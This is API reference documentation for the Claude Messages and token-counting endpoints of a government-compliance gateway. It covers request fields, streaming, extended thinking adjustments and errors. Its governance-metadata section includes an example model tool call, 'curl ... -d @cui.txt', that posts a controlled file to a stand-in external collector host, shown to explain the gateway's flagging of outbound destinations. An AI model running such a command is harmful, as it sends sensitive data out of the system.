Messages

POST /v1/messages Native Anthropic Messages API. Anthropic-format clients (Claude Code, Claude Desktop, the Anthropic SDKs) target Consus Gateway directly, with no translation layer. Any active Claude model can be served. The compliance level in the model field selects the government cloud provider that serves the request (see Models for the model:level grammar and the catalog). Google and OpenAI models are not served here; use /v1/chat/completions for those. This surface has two endpoints: /v1/messages (this section) and /v1/messages/count_tokens.

Request

Headers

Header	Required	Description
`x-api-key`	Yes	Your API key
`Content-Type`	Yes	`application/json`
`anthropic-version`	No	Accepted but ignored. The gateway manages the version field for upstream compatibility. Use the body field `anthropic_version` to override.

Body Parameters

The body is native Anthropic Messages API JSON; see Anthropic’s Messages API reference for the full schema. The gateway validates three fields and passes the rest through for the model to validate:

Parameter	Type	Required	Description
`model`	string	Yes	A Claude model with a compliance level, e.g. `claude-opus-4-6:fedramp-high` or `claude-sonnet-4-5:itar`. Bare model names return a `400`. See Models.
`messages`	array	Yes	Non-empty array of Anthropic-format messages.
`max_tokens`	integer	Yes	Positive integer.

Everything else (system, temperature, top_p, tools, tool_choice, stop_sequences, metadata, stream, thinking) passes through unchanged, with three gateway-side behaviors to know about:

stream: true switches the response to Server-Sent Events. See Streaming.
Fields the upstream provider’s API version does not support are stripped rather than rejected (e.g. context_management).
When a thinking block is enabled, the gateway adjusts a few related fields so the request stays valid upstream, and tells you what changed in a response header. See Extended Thinking.

Response

Headers

Header	Description
`x-consus-served-model`	The base model that served the request, e.g. `claude-opus-4-6`.
`x-consus-thinking-adjusted`	Present only when the gateway adjusted an extended-thinking request. The value summarizes what changed, e.g. `budget 32000->7168`. See Extended Thinking.
`x-request-id`	UUID for tracing this request through gateway logs.

Non-Streaming

The body is the native Anthropic Messages response, with one optional addition (x_consus_governance, see Tool Use):

{
  "id": "msg_01ABC...",
  "type": "message",
  "role": "assistant",
  "content": [
    {"type": "text", "text": "Hello! How can I help you?"}
  ],
  "model": "claude-opus-4-6",
  "stop_reason": "end_turn",
  "stop_sequence": null,
  "usage": {
    "input_tokens": 10,
    "output_tokens": 12
  }
}

Streaming

Set stream: true to receive Server-Sent Events matching Anthropic’s streaming protocol:

event: message_start
data: {"type":"message_start","message":{...}}

event: content_block_start
data: {"type":"content_block_start","index":0,"content_block":{"type":"text","text":""}}

event: content_block_delta
data: {"type":"content_block_delta","index":0,"delta":{"type":"text_delta","text":"Hello!"}}

event: content_block_stop
data: {"type":"content_block_stop","index":0}

event: message_delta
data: {"type":"message_delta","delta":{"stop_reason":"end_turn","stop_sequence":null},"usage":{"output_tokens":12}}

event: message_stop
data: {"type":"message_stop"}

Tool use blocks emit content_block_delta with {"type":"input_json_delta","partial_json":"..."}. Streaming is real and incremental: the gateway relays the provider’s native events as the model generates them, so first-token latency reflects the model, not the full completion. Streaming requests are not bound by the 5-minute non-streaming ceiling. They run up to ~15 minutes (see Request Timeout), which lets long reasoning turns complete instead of timing out.

Token Counting

POST /v1/messages/count_tokens Counts the input tokens a request would consume, without generating anything. Anthropic-format clients call this automatically to budget their context windows; the gateway serves it so they don’t fall back to sending paid probe requests. Counting is free: requests are never billed and successful counts do not appear in your usage records.

Request

Same body shape as /v1/messages: model and messages required, plus any of system, tools, tool_choice, and thinking:

curl -X POST https://api.consus.io/v1/messages/count_tokens \
  -H "x-api-key: $CONSUS_API_KEY" \
  -H "Content-Type: application/json" \
  -d '{
    "model": "claude-opus-4-6:fedramp-high",
    "messages": [{"role": "user", "content": "Hello."}]
  }'

max_tokens is not required. It is accepted and ignored: it is an output-side cap that cannot change the input count, so the same body always counts the same with or without it.

Response

{"input_tokens": 2095}

The count matches what the identical billed request would report in usage.input_tokens, including tool-definition overhead and the prompt overhead of an enabled thinking block. Output-side settings that cannot affect the input count (max_tokens, output_config) are ignored. A thinking block is counted the way the billed request sends it: on models that use the budgeted shape, an adaptive-shape block is converted to budgeted and its overhead counted; on adaptive-API models the block adds no input overhead and is ignored. Budget values below the API minimum are raised for the count (the budget amount itself never affects the input count).

Model coverage

Counting is available for every Claude compliance level — Vertex-served levels (:il2, :fedramp-high) and Bedrock-served levels (:il5, :itar) alike — with one model-specific exception. Claude Opus 4.8’s :itar level does not support token counting. Opus 4.8 is served on AWS Bedrock only for ITAR (claude-opus-4-8:itar), and AWS Bedrock does not yet support token counting for this model, so a count request on that level returns a 400 invalid_request_error — “Token counting is not yet available for this model. Estimate client-side for now.” The gateway fails closed here rather than counting the prompt on Opus 4.8’s lower-boundary Vertex deployment, which would cross the compliance boundary. Counting works normally on Opus 4.8’s Vertex-served levels (:il2, :fedramp-high), and inference itself (/v1/messages, /v1/chat/completions, streaming) is fully available on :itar — only the pre-flight token count is affected. All other Claude models count on every level as usual.

Tool Use

Tool definitions and tool_use content blocks pass through natively. There is no translation through OpenAI’s tool_calls shape.

Tool Call Governance Metadata

When a model returns tool_use blocks, the gateway scans each input payload for outbound destinations (URLs with a scheme like https://, ftp://, s3://, data:, mailto:, and raw IPv4 addresses). When any are found, the response includes an advisory x_consus_governance field alongside the standard Anthropic body. The tool_use block itself is not modified.

{
  "id": "msg_01...",
  "type": "message",
  "role": "assistant",
  "content": [
    {
      "type": "tool_use",
      "id": "toolu_01...",
      "name": "Bash",
      "input": {"command": "curl https://collector.example.com/ingest -d @cui.txt"}
    }
  ],
  "model": "claude-opus-4-6",
  "stop_reason": "tool_use",
  "usage": {"input_tokens": 20, "output_tokens": 30},
  "x_consus_governance": {
    "flags": [
      {
        "tool_call_id": "toolu_01...",
        "tool_name": "Bash",
        "destinations": ["https://collector.example.com/ingest"],
        "reason": "external_destination"
      }
    ]
  }
}

In streaming mode, flagged responses receive a final consus_governance SSE event after message_stop:

event: consus_governance
data: {"type":"consus_governance","x_consus_governance":{"flags":[...]}}

This is an advisory signal. The gateway does not block or redact tool calls. Your application receives the real input and decides what to do with the destinations.

Extended Thinking

Claude’s native extended thinking is supported. Models on Anthropic’s adaptive thinking API (Claude Opus 4.7 and 4.8) take the adaptive shape, which the gateway forwards untouched:

{
  "max_tokens": 32000,
  "thinking": {"type": "adaptive"},
  "output_config": {"effort": "high"},
  "messages": [{"role": "user", "content": "..."}]
}

Earlier Claude models use the budgeted shape:

{
  "max_tokens": 32000,
  "thinking": {"type": "enabled", "budget_tokens": 8000},
  "messages": [{"role": "user", "content": "..."}]
}

The government cloud providers enforce several constraints on budgeted thinking that the public Anthropic API does not. Rather than reject the request with a 400, the gateway adjusts it so it stays valid and reports any change in the x-consus-thinking-adjusted response header:

Budget clamp. budget_tokens must be strictly less than max_tokens. When it is not, the gateway lowers it to fit and leaves room for output. For example, budget_tokens: 32000 with max_tokens: 8192 is lowered to 7168.
Drop when there is no room. When max_tokens is too small to hold even the minimum thinking budget plus output, thinking is dropped and the request runs without it.
Sampling stripped. temperature, top_p, and top_k are not compatible with extended thinking, so they are removed when thinking is enabled.
Forced tool choice relaxed. A forced tool_choice ({"type": "any"} or a specific tool) is not compatible with extended thinking, so it is changed to {"type": "auto"}.

If you opt into interleaved thinking by sending the interleaved-thinking-2025-05-14 beta in the request body, over-budget allowances depend on the serving provider: Bedrock-served compliance levels honor a budget above max_tokens, while Vertex-served levels clamp it regardless. The header tells you what happened either way. This mirrors the reasoning handling on /v1/chat/completions, applied to the native thinking block instead of reasoning_effort.

Errors

Errors are returned in Anthropic’s error shape:

{
  "type": "error",
  "error": {
    "type": "invalid_request_error",
    "message": "'max_tokens' must be a positive integer."
  }
}

Status	Anthropic `error.type`	When
400	`invalid_request_error`	Body is not valid JSON; `model` missing, unknown, missing its compliance level, above its authorized level, or not a Claude model; `messages` empty/missing; `max_tokens` missing or non-positive (`/v1/messages` only); or the upstream model rejected the request.
401	`authentication_error`	API key is missing or invalid.
429	`rate_limit_error`	Upstream model rate limit, or your key’s rate/quota limit.
500 / 502 / 504	`api_error`	Internal error, upstream provider outage, or upstream timeout.

Known Limitations

No Anthropic Batches or Files APIs. /v1/messages/batches and /v1/files are not implemented; only /v1/messages and /v1/messages/count_tokens are served on the Anthropic surface.

Examples

curl

curl -X POST https://api.consus.io/v1/messages \
  -H "x-api-key: $CONSUS_API_KEY" \
  -H "Content-Type: application/json" \
  -d '{
    "model": "claude-opus-4-6:fedramp-high",
    "max_tokens": 256,
    "messages": [{"role": "user", "content": "Hello."}]
  }'

Streaming

curl -N -X POST https://api.consus.io/v1/messages \
  -H "x-api-key: $CONSUS_API_KEY" \
  -H "Content-Type: application/json" \
  -d '{
    "model": "claude-opus-4-6:fedramp-high",
    "max_tokens": 1024,
    "stream": true,
    "messages": [{"role": "user", "content": "Write a haiku about rockets."}]
  }'

Anthropic Python SDK

from anthropic import Anthropic

client = Anthropic(
    base_url="https://api.consus.io",
    api_key="$CONSUS_API_KEY",
    default_headers={"x-api-key": "$CONSUS_API_KEY"},
)

message = client.messages.create(
    model="claude-opus-4-6:fedramp-high",
    max_tokens=256,
    messages=[{"role": "user", "content": "Hello."}],
)
print(message.content[0].text)

count = client.messages.count_tokens(
    model="claude-opus-4-6:fedramp-high",
    messages=[{"role": "user", "content": "Hello."}],
)
print(count.input_tokens)

Product

Getting Started

API Reference

Integrations

Request

Headers

Body Parameters

Response

Headers

Non-Streaming

Streaming

Token Counting

Request

Response

Model coverage

Tool Use

Tool Call Governance Metadata

Extended Thinking

Errors

Known Limitations

Examples

curl

Streaming

Anthropic Python SDK

​Request

​Headers

​Body Parameters

​Response

​Headers

​Non-Streaming

​Streaming

​Token Counting

​Request

​Response

​Model coverage

​Tool Use

​Tool Call Governance Metadata

​Extended Thinking

​Errors

​Known Limitations

​Examples

​curl

​Streaming

​Anthropic Python SDK

Request

Headers

Body Parameters

Response

Headers

Non-Streaming

Streaming

Token Counting

Request

Response

Model coverage

Tool Use

Tool Call Governance Metadata

Extended Thinking

Errors

Known Limitations

Examples

curl

Streaming

Anthropic Python SDK